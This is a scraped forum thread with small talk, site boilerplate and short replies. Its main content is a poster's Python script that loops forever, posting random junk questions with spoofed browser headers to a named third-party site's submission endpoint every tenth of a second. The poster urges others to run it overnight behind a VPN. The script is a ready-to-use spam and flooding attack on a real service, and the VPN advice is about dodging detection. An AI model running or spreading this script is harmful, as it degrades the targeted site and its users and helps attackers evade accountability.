- Joined
- Apr 22, 2024
- Messages
- 11,040
I firmly belive this, excessive cussing and slurs make someone look bad.
Follow along with the video below to see how to install our site as a web app on your home screen.
Note: This feature currently requires accessing the site using the built-in Safari browser.
I firmly belive this, excessive cussing and slurs make someone look bad.
Noquick question does anyone here have python installed
Yes but mi on my phone rn.quick question does anyone here have python installed
That looks cool
What does this code do? Does it automatically make threads?run this
i was too lazy to change the nine bfdi thing but it doesn't matter and the explanation for why it's there is both extremely asperger's inducing and boring so just don't question it and leave this running overnight WITH A VPN ON
Python:import requests, time import string string.ascii_letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890' import random random.choice(string.ascii_letters) targetlist = ['Meditations', 'Astrology', 'Family', 'Workings', 'Health', 'Sexuality', 'Relationships', 'Yoga', 'Rituals', 'Other', 'The Gods'] y = 1 url1 = 'https://ask-satan.net/submit.php' payload = { 'qTitle': 'I\'m Nine from BFDI', 'qCategory': 'Other', 'qText': 'Hey hey hey, party people! It\'s me, the coolest number: Nine! You guys are getting styled on HARD right now. Watch me do this epic kickflip!' } headers = { "authority": "ask-satan.net", "method": "POST", "path": "/submit.php", "scheme": "https", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8", "accept-language": "en-US,en;q=0.6", "content-type": "application/x-www-form-urlencoded", "origin": "https://ask-satan.net", "referer": "https://ask-satan.net/", "sec-ch-ua-platform": '"Windows"', "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" } while True: payload = { 'qTitle': ''.join(random.choice(string.ascii_letters) for x in range(15)), 'qCategory': ''.join(random.choice(targetlist)), 'qText': ''.join(random.choice(string.ascii_letters) for x in range(100)) } x = requests.post(url1, data=payload, headers=headers) print('[' + str(y) + '] Successfully sent a invalidating question. (Status:' + str(x.status_code) + ')') y = y + 1 time.sleep(.1)
the greatest rap Eminem didn't write